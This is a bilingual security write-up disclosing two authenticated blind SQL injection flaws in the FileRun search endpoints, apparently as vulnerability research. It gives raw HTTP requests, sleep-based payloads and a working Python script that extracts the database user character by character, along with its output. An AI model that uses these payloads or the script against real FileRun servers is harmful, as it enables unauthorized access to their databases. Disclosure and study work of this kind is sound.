Blind SQL Injection Vulnerability in FileRun<=2017.09.25

0x00 前言

0x00 Preface —- 在内部分享中需要用到私有的云盘服务,一番寻找之后发现FileRun是个不错的应用程序.FileRun允许我们自己搭建云存储,方便我们的照片,视频等文件更好的分享和存储. Sometimes team private file sharing need use file sharing web application.I noticed FileRun is a great application,This application allows us to access our files anywhere through self-hosted secure cloud storage.


0x01 漏洞发现

0x01 How To Find The Vulnerability —-

需要我们以superuser登录后台 These vulnerabilitys was found after the authentication. After we logged in as superuser.

SQL1

控制面板——>Admin——>用户——>快速搜索,这样将会发送一个POST请求。 go to control panel——>Admin——>user——>search,will generate a POST request to the server.


POST /?module=users&section=cpanel&page=list HTTP/1.1
Host: target.com
Content-Length: 20
Origin: http://target.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://target.com/?module=cpanel&_popup_id=popups_1
Accept-Language: zh-CN,zh;q=0.9
Cookie: __cfduid=d7455062d8788785c8b64d8dfef5a7f041513411013; language=chinese; FileRunSID=e578cd49697ef564ed0979bde9d67dcf
Connection: close

limit=50&search=aaaa

我注意到search参数容易受到SQL注入的影响,通过传入aaaa’ 服务器返回了一个500的响应状态: I notice that the search parameter might be vulnerable to SQL Injection,I injected a single quote after the value (example:aaaa’),examined the server response error:

userlist.png

然后构造了基于sleep函数延时的payload: Use MySQL’s delay function sleep () to testing.

'xor(sleep(5))or'

结果如下

sleeptime.png

然后使用Blind SQL注入技术来获取select user()数据验证脚本如下: Here I create a simple script to extract current select user()query result using Boolean-based technique.


#!/usr/bin/env python
# -*- coding:utf-8 -*-
#__author__ = 'scanf'
import httplib
import time

#add cookies

headers = {'Content-Type': 'application/x-www-form-urlencoded',
           'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',
           'Cookie': '__cfduid=d7455062d8788785c8b64d8dfef5a7f041513411013; language=chinese; FileRunSID=e578cd49697ef564ed0979bde9d67dcf',
           #'Cookie' : 'input you cookie',
           }
payloads = '[email protected]_.*'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 15):
        for payload in payloads:
            s = "aaaa'xor(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))or'" % (i, ord(payload))
            s = '''limit=50&search=''' + s
            #url = http://target.com/?module=users&section=cpanel&page=list
            conn = httplib.HTTPConnection('target.com', timeout=30)
            conn.request(method='POST', url='/?module=users&section=cpanel&page=list', body=s,headers=headers)
            start_time = time.time()
            html_doc = conn.getresponse().read()
            conn.close()
            print '.',
            if html_doc.find('uid') > 0:
                user += payload
                print '\n[in progress]', user,
                break
print '\n[Done] MySQL user is %s' % user

[20:39:20] Start to retrive MySQL User:
. . . . . . 
[in progress] f . . . . . . . . . 
[in progress] fi . . . . . . . . . . . . 
[in progress] fil . . . . . 
[in progress] file . . . . . . . . . . . . . . . . . . 
[in progress] filer . . . . . . . . . . . . . . . . . . . . . 
[in progress] fileru . . . . . . . . . . . . . . 
[in progress] filerun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[in progress] [email protected] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[in progress] [email protected] . . .

SQL2

控制面板——>元数据——>快速搜索,输入字符串后将发起一个POST请求: control panel——>Metadata——>search Same as SQL1,will generate a POST request to the server:


POST /?module=metadata&section=cpanel&page=list_filetypes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://target.com/?module=cpanel&_popup_id=popups_1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 36
Cookie: __cfduid=df5ddd49a2303cb2e13b6aa8ece2af7b11513411363; FileRunSID=fa163cd088b68ae20c689826e3a70479; language=chinese
Connection: close

limit=50&search=aaa'xor(sleep(2))or'

然后超时后响应: sleep() function is executed: time.png

时间线

timeline —-

Table of Contents